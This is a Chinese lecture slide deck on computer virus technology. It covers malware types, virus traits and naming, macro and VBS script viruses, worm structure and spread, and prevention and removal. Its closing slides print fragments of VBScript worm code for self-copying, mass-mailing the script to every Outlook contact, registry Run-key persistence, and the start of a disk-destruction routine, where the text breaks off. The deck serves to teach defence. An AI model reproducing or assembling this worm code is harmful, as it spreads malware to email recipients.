课件：计算机病毒技术.ppt

1,计算机病毒技术,主要内容 介绍计算机病毒的历史、病毒的基本特征、病毒的命名、病毒的预防及清除等 介绍蠕虫分类、技术特点、基本结构、传播过程、对蠕虫的防范和清除方法等,2,恶意程序的种类,1、陷门（或称后门） 2、逻辑炸弹 3、特洛伊木马 4、病毒 5、蠕虫 6、细菌 7、流氓软件,3,计算机病毒的历史,1983年首次确认计算机病毒，1988年美国研究生莫里斯编写的蠕虫病毒首次造成重大经济损失，引起了人们的广泛重视。我国从上世纪八十年代开始发现计算机病毒，如“黑色星期五“，“米氏病毒“，“小球病毒“等。 计算机病毒经历了从dos病毒到windows病毒，再到网络蠕虫的发展过程，计算机病毒的种类层出不穷。 伴随着计算机病毒的发展，杀毒软件和防病毒软件也得到了迅速的发展,4,计算机病毒的定义,计算机病毒： 是指编制或者在计算机程序中插入破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码。,5,计算机病毒产生的原因,1、恶作剧或表现自己 2、经济利益 3、个别人的报复心理 4、版权保护 5、政治目的,6,计算机病毒的特征,传染性 判别一个程序是否为计算机病毒的最重要条件 隐蔽性 病毒一般只有几百或1k字节，附在正常程序内或磁盘上，很难区别病毒程序与正常程序。 潜伏性 只有在满足其特定条件时才启动其表现（破坏）模块 表现性 任何病毒只要侵入系统，都会对系统及应用程序产生程度不同的影响。,7,病毒的传染性,计算机病毒的传染性是指病毒具有把自身复制到其它媒体的特性。这些媒体可以是程序、文件或存储介质。 病毒传染的种类 文件传染： 包括传染可执行文件、文档文件、数据文件和web文件等 引导扇区传染 引导扇区是系统第一次读该磁盘或引导系统时要读取的地方，因此只要访问磁盘就可能传染引导扇区病毒 网络传染 通过网络直接进入目标主机，而不需要通过染毒文件作为载体，典型代表是蠕虫病毒 文件感染性病毒和引导区病毒都需要具有自我检测的功能，以避免二次感染造成自身的崩溃。,8,病毒的隐蔽性,病毒程序一般都很小，只有几百或1k字节，通常会把自己嵌入到染毒文件中，并且不会改变染毒文件的属性(如最后修改时间、只读属性等)。 病毒程序在保证自己运行的前提下，通常会使系统和染毒文件也能正常运行。 病毒编写者在编制病毒程序时通常会加入很多非正常的跳转指令或采用加密技术以避免病毒程序被破解。,9,病毒的潜伏性,病毒的潜伏性是指病毒具有依附其它媒体而寄生的能力。 计算机病毒只有当满足某种触发条件时才会发作，这些触发条件包括三种： 利用时间触发：包括系统时间和病毒内自带的计数器 利用计算机内执行的特定操作触发 外部命令触发,10,病毒的表现性,病毒的表现性是指当病毒被触发时，病毒在染毒计算机上发作所表现出的症状和破坏性。 病毒的表现性包括： 1、有益的服务 2、占用CPU资源 3、干扰系统运行 4、干扰键盘、喇叭或屏幕 5、干扰打印机 6、攻击CMOS，攻击硬件 7、攻击系统数据区 8、攻击文件 9、攻击内存 10、窃取机密信息 11、窃取核心控制权 12、破坏网络系统,11,病毒的分类,引导型病毒 文件型病毒 宏病毒 蠕虫病毒 木马病毒 脚本病毒 多态性病毒,12,计算机病毒的表现现象,经常死机 运行速度变慢 打印和通信异常 系统文件属性发生变化 磁盘空间减少 自动链接某些网站 系统无法启动 文档丢失或破坏 网络瘫痪,13,计算机病毒的一般组成,安装模块 传染模块 破坏模块,14,计算机病毒制作技术,采用自加密技术 采用变形技术 采用特殊的隐形技术 对抗计算机病毒防范系统 反跟踪技术 利用中断处理机制,15,宏病毒,宏病毒是使用宏语言编写的程序，可以在一些数据处理系统中运行，存在于字处理文档、数据表格、数据库、演示文档等数据文件中，利用宏语言的功能将自己复制并且繁殖到其它数据文档中,16,宏的概念,宏是指一段类似于批处理命令的多行代码的集合。 宏设计的目的是为了简化我们的工作，它可以记录命令和记录，然后自动运行，而宏病毒则是利用了宏自动运行的特点,17,宏的种类与编写,在word等办公软件中有许多“内建宏”，当用户进行打开文件、新建文件、保存文件、打印文件和关闭文件等操作时，会调用这些宏，例如打开文件之前调用FileOpen、打印文件之前调用FilePrint等，还有一些会自动调用的全局宏，如AutoOpen、AutoClose、AutoNew等 编写宏的操作如下 按Alt_F11打开宏编辑窗口，右键单击“Normal”，选择“插入-模块”，然后输入代码并保存,18,宏病毒如何传播,宏包括两种： 每个文档中间包含的宏，如FileOpen 为所有打开的文档共用的宏，如AutoOpen 宏病毒一般首先隐藏在一个指定的Word文件中，一旦运行该文件，宏病毒即被运行。宏病毒首先将自身拷贝到全局宏的区域，使得所有打开的文件都会使用该宏。 当Word退出时，全局宏将被存放在某个全局的模板文件中。当Word再次运行时会自动装入病毒并执行。,19,如何发现宏病毒,选择菜单：“工具”-“宏”-“宏” 或直接按Alt+F11，如果发现有很多以“Auto”开始的宏，那么很可能被宏病毒感染了,20,如何清除宏病毒,将感染宏病毒的word文件另存为RTF格式，然后退出文档编辑器，再删除已感染的文档文件、 normal.dot和安装目录下的startup子目录下的文件 Word文件转换为RTF格式会导致正常使用的宏丢失，因此需要事先保存这些宏，再清除病毒后再恢复这些正常的宏,21,脚本病毒,脚本病毒是使用脚本语言编写的计算机病毒，其编写方法比用其它语言简单，且具有传播快、破坏力大的特点 典型案例 “爱虫”病毒、“新欢乐时光”病毒,22,WSH简介,WSH概念 是Windows Scripting Host的缩写，即Windows脚本宿主 WSH最早出现于Windows98系统，可以解释执行脚本语言 WSH默认脚本宿主可以设为wscript.exe或cscript.exe,23,VBS脚本病毒的特点,编写简单 破坏力大 传染力强 传播范围大 病毒源码容易被获取，变种多 欺骗性强 使得病毒生产机实现起来非常容易,24,VBS脚本病毒的弱点,绝大部分VBS脚本病毒运行时需要用到一个对象：FileSystemObject VBS代码是通过WSH来解释执行的 VBS脚本病毒的运行需要关联程序Wscript.exe的支持 通过网页传播的病毒需要ActiveX的支持 通过E_mail传播的病毒需要OutlookExpress的自动发送邮件功能支持，而绝大部分VBS脚本病毒都是以E_mail做为主要传播方式的,25,VBS脚本病毒的预防和解除,禁用文件系统对象FileSystemObject 用regsvr32 scrrun.dll /u命令可以禁止文件系统对象，或直接查找scrrun.dll文件删除或改名 卸载Windows Scripting Host 进入“控制面板”中的“添加/删除程序”卸载该组件 删除VBS、VBE、JS、JSE 文件后缀名与应用程序的关联 进入“我的电脑”-“察看”-“文件夹选项”-“文件类型”，然后删除这些文件后缀名与应用程序的关联 在Windows目录中，找到Wscript.exe并删除或改名,26,VBS脚本病毒的预防和解除,自定义安全级别，将“Internet选项”中设置禁用ActiveX控件及插件 禁止OutlookExpress的自动收发邮件功能 设置显示文件扩展名 将系统的网络连接的安全级别设置至少为“中等” 杀毒软件,27,计算机杀毒软件制作技术,特征代码法 校验和法 行为监测法 虚拟机技术 主动内核技术 启发扫描的反病毒技术 实时反病毒技术 邮件病毒防杀技术,28,病毒的命名规则,一般格式为： 病毒前缀是指一个病毒的种类，他是用来区别病毒的种族分类的。 病毒后缀是指一个病毒的变种特征，是用来区别具体某个家族病毒的某个变种的。一般都采用英文中的26个字母来表示。,29,病毒的命名一,系统病毒 系统病毒的前缀是Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件，并通过这些文件进行传播。如CIH病毒。 蠕虫病毒 蠕虫病毒的前缀是Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播，很大部分的蠕虫病毒都有向外发送带毒邮件，阻塞网络的特性。比如冲击波（阻塞网络），小邮差（发带毒邮件）等。,30,病毒的命名二,木马病毒、黑客病毒 木马病毒的前缀是Trojan，黑客病毒前缀是 Hack。木马病毒通常是通过网络或者系统漏洞进入用户的系统并隐藏，然后向外界泄露用户的信息，而黑客病毒则有一个可视的界面，能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的。 脚本病毒 病毒的前缀是Script。脚本病毒的公有特性是使用脚本语言编写，通过网页进行的传播的病毒。脚本病毒还会有如下前缀：VBS、JS（表明是何种脚本编写的）。如欢乐时光（VBS.Happytime）、十四日（Js.Fortnight.c.s）等。 宏病毒 宏病毒的前缀是Macro，第二前缀是：Word、Word97、Excel、Excel97等其中之一。如：著名的美丽莎(Macro.Melissa)。,31,病毒的命名三,后门病毒 后门病毒的前缀是Backdoor。该类病毒的公有特性是通过网络传播，给系统开后门，给用户电脑带来安全隐患。如后门Backdoor.IRCBot 。 病毒种植程序病毒 病毒的前缀是Drooper，这类病毒公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下，由释放出来的新病毒产生破坏。如：冰河播种者（Dropper.BingHe2.2C）、MSN射手(Dropper.Worm.Smibag)等。 破坏性程序病毒 破坏性程序病毒的前缀是Harm。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒便会直接对用户计算机产生破坏。如：格式化C盘（Harm.formatC.f）、杀手命令（Harm.Command.Killer）等。,32,病毒的命名四,玩笑病毒 玩笑病毒的前缀是Joke，也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒会做出各种破坏操作来吓唬用户，其实病毒并没有对用户电脑进行任何破坏。如：女鬼（Joke.Girlghost）病毒。 捆绑机病毒 捆绑机病毒的前缀是：Binder。这类病毒的公有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如QQ、IE捆绑起来，表面上看是一个正常的文件，当用户运行这些捆绑病毒时，会表面上运行这些应用程序，然后隐藏运行捆绑在一起的病毒，从而给用户造成危害。如：捆绑QQ（Binder.QQPass.QQBin）、系统杀手（Binder.killsys）等。,33,计算机病毒的预防,1、安装防病毒产品并及时更新最新的病毒特征库 2、安装防火墙 3、补齐系统漏洞及应用程序漏洞 4、不打开来历不明的邮件中的附件 5、对外来的软盘、光盘和其它存储介质，及对电子邮件和互联网文件进行病毒检查。 6、尽量不从不可靠的渠道下载软件 7、不访问恶意网页 8、善于从异常情况中发现病毒并予以清除,34,计算机病毒的清除,由于病毒通常会把自身嵌入或替换染毒文件，因此我们一方面要养成定期数据备份的好习惯，另外在杀病毒前也要将染毒文件做好备份，以免在杀病毒的同时破坏了原有文件，给自己造成损失。 使用杀毒软件进行杀毒，杀毒软件必须先查杀内存中的病毒，再杀磁盘中的病毒，否则需要用干净的引导盘启动后再用杀毒软件杀毒。 杀毒软件的病毒特征库必须是最新的，并且最好能用两种以上的杀毒软件进行杀毒，降低某种杀毒软件可能存在的缺陷而漏过某些病毒。,35,蠕虫病毒,蠕虫病毒是指通过复制自身，并将副本通过网络传到其他计算机上的程序。 蠕虫病毒具有病毒的一些共性，如传染性、隐蔽性、潜伏性、破坏性等。 在产生的破坏性上，蠕虫病毒也不是普通病毒所能比拟的，网络的发展使得蠕虫可以在短时间内蔓延整个网络，造成网络瘫痪。,36,蠕虫所造成的破坏,37,蠕虫与一般病毒的异同,一般的病毒是需要寄生的，它可以通过自己指令的执行，将自己的指令代码写到其他程序的体内，而被感染的文件就被称为”宿主”。 蠕虫一般不采取插入文件的方法，而是复制自身在互联网环境下进行传播。一般病毒的传染能力主要是针对计算机内的文件系统而言，而蠕虫的传染目标是互联网内的所有计算机。 局域网条件下的共享文件夹，电子邮件email，网络中的恶意网页，大量存在着漏洞的服务器等都成为蠕虫传播的良好途径。,38,蠕虫的技术特点,利用操作系统和应用程序的漏洞主动进行攻击 此类病毒主要有“红色代码”、“尼姆达”、”求职信”等。 “尼姆达”病毒和“红色代码”病毒是利用了微软IIS服务器软件的漏洞，“Sql蠕虫王”病毒则是利用了SQL Server2000的一个漏洞。 传播方式多样 如“尼姆达”病毒和”求职信”病毒，可利用的传播途径包括文件、邮件附件、Web服务器、网络共享等。,39,蠕虫的技术特点,病毒制作技术与传统的病毒不同 蠕虫病毒可以采用脚本语言编写，制作相对简单。 与黑客技术相结合! 潜在的威胁和损失更大。 以红色代码为例，感染后的机器的web目录的scripts下将生成一个root.exe，可以远程执行任何命令，从而使黑客能够再次进入!,40,蠕虫的基本结构,蠕虫的基本程序结构为： 传播模块 负责蠕虫的传播。 隐藏模块 侵入主机后，隐藏蠕虫程序，防止被用户发现。 目的功能模块 实现对计算机的控制、监视或破坏等功能。 蠕虫的传播技术是蠕虫技术的首要技术，传播模块实现的实际上是自动入侵的功能。没有蠕虫的传播技术，也就谈不上什么蠕虫技术了,41,蠕虫的传播过程,传播模块分为： 扫描模块、攻击模块和复制模块。 蠕虫程序的一般传播过程为： 1.扫描：由蠕虫的扫描功能模块负责探测存在漏洞的主机。当程序向某个主机发送探测漏洞的信息并收到成功的反馈信息后，就得到一个可传播的对象。 2.攻击：攻击模块按漏洞攻击步骤自动攻击步骤1中找到的对象，取得该主机的权限（一般为管理员权限），获得一个shell。 3.复制：复制模块通过原主机和新主机的交互将蠕虫程序复制到新主机并启动。,42,蠕虫所造成的威胁,蠕虫所造成的主要威胁包括： 占用了大量网络带宽，造成网络拥塞，网络性能急剧下降。 消耗系统资源，导致系统的性能下降。 有些蠕虫还会在染毒机器上留有后门，威胁计算机的安全。 蠕虫的扫描策略 随机选取某一段IP地址，然后对这一地址段上的主机扫描。有些扫描程序会不断重复上面这一过程。这样，随着蠕虫的传播，新感染的主机也开始进行这种扫描，这些扫描程序不知道那些地址已经被扫描过，它只是简单的随机扫描互联网。于是蠕虫传播的越广，网络上的扫描包就越多。 蠕虫传播的其它方式 例如利用邮件地址薄获得邮件地址，群发带有蠕虫程序的邮件，用户收到邮件后邮件被动打开，蠕虫程序启动,43,企业用户对蠕虫病毒的防范措施,加强网络管理员安全管理水平，提高安全意识 建立病毒检测系统 建立应急响应系统 建立灾难备份系统 对于局域网而言，可以采用以下一些主要手段： 在因特网接入口处安装防杀计算机病毒产品，将病毒隔离在局域网之外。 对邮件服务器进行监控，防止带毒邮件进行传播。 对局域网用户进行安全培训。,44,个人用户对蠕虫病毒的防范措施,安装合适的杀毒软件 经常升级病毒库 提高防杀毒意识，不要轻易去点击陌生的站点 不随意查看陌生邮件，尤其是带有附件的邮件,45,如何预防和清除蠕虫,补齐系统和应用软件的补丁程序 安装防病毒软件 利用蠕虫专杀工具 手工清除蠕虫 注意: 根据蠕虫利用网络传播的特点，因此在杀蠕虫时需要切断染毒机器与网络的连接，否则在杀蠕虫的同时又会不断地重新感染。,46,如何手工清除蠕虫,在蠕虫专杀工具尚未公布之前，需要通过手工清除蠕虫，手工清除掌握四要素：漏洞、内存、注册表、文件。 清除步骤如下： 1、给系统漏洞打补丁 2、清除内存中的病毒进程 3、删除注册表中的病毒项 为了每次开机自动启动，蠕虫会修改注册表中的启动项，具体位置是HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 4、删除病毒文件。 如果该文件不能删除，则进入安全模式或者用A盘直接启动到DOS模式下进行删除。,47,云安全技术,“云安全”技术是网络时代信息安全的最新体现，它融合了并行处理、网格计算、未知病毒行为判断等新兴技术和概念，通过网状的大量客户端对网络中软件行为的异常监测，获取互联网中木马、恶意程序的最新信息，发送到服务端进行自动分析和处理，然后再把病毒和木马的解决方案分发到每一个客户端。 云安全技术应用后，识别和查杀病毒不再仅仅依靠本地硬盘中的病毒库，而是依靠庞大的网络服务，实时进行采集、分析以及处理。整个互联网就是一个巨大的“杀毒软件”，参与者越多，每个参与者就越安全，整个互联网就会更安全。以金山毒霸为例，“依托于云安全技术，金山毒霸2009病毒库病毒样本数量增加了5倍、日最大病毒处理能力提高了100倍、紧急病毒响应时间缩短到1小时以内。”可以说云安全开创了计算机安全2.0时代。,48,蠕虫病毒自我复制的部分代码,创建一个文件对象 Set objFs = CreateObject(“Scripting.FileSystemObject“) 通过文件系统对象的方法创建一个TXT方法 objFs.CreateTextFile “c:virus.txt“, 1 将上述代码保存为.vbs的VB脚本文件，执行后将在C盘中创建一个TXT文件。 执行代码 如将第二条语句改为： objFs.GetFile(WScript.ScriptFullName).Copy(“c:virus.vbs”) 就可以实现将自身复制到C盘virus.bat文件 执行代码,49,蠕虫病毒传播的部分代码,创建一个OUTLOOK应用的对象 Set objOA=Wscript.CreateObject(“Outlook.Application“) 取得MAPI名字空间 Set objMapi=objOA.GetNameSpace (“MAPI“) 遍历地址簿 For i=1 to objMapi.AddressLists.Count Set objAddList=objMapi.AddressLists (i) For j=1 To objAddList. AddressEntries.Count Set objMail=objOA.CreateItem (0) 取得收件人邮件地址 objMail.Recipients.Add (objAddList. AddressEntries (j) 设置邮件主题,这个往往具有很大的诱惑性质 objMail.Subject=“你好!“,50,蠕虫病毒传播的部分代码,设置信件内容 objMail.Body=“这次给你的附件,是我的新文档！“ 把自己作为附件扩散出去 objMail.Attachments.Add (“c:virus.vbs“) 发送邮件 objMail.Sen Next Next 清空objMapi变量,释放资源 Set objMapi=Nothing 清空objOA变量 set objOA=Nothing,51,蠕虫病毒潜伏的部分代码,容错语句，避免程序崩溃 On Error Resume Next dim wscr, rr 创建WScript.Shell对象 set wscr=CreateObject(“WScript.Shell“) 读入注册表中的超时键值 rr=wscr.Regread(“HKEY_CURRENT_USERSoftwareMicrosoftWindows Script HostSettingsTimeout“) if(rr=1) then 超时设置 wscr.RegWrite “ HKEY_CURRENT_USERSoftwareMicrosoftWindows Script HostSettingsTimeout “, 0, “REG_DWORD“ end if 执行代码,52,蠕虫病毒潜伏的部分代码,以下代码是修改注册表，使得每次系统启动时自动执行脚本文件 RegCreate “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunMSKernel32“, dirsystem & “MSKernel32.vbs“ RegCreate “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServicesWin32DLL“, dirwin & “Win32DLL.vbs“,53,蠕虫病毒破坏的部分代码,破坏硬盘的过程 Sub killc() 容错语句，避免程序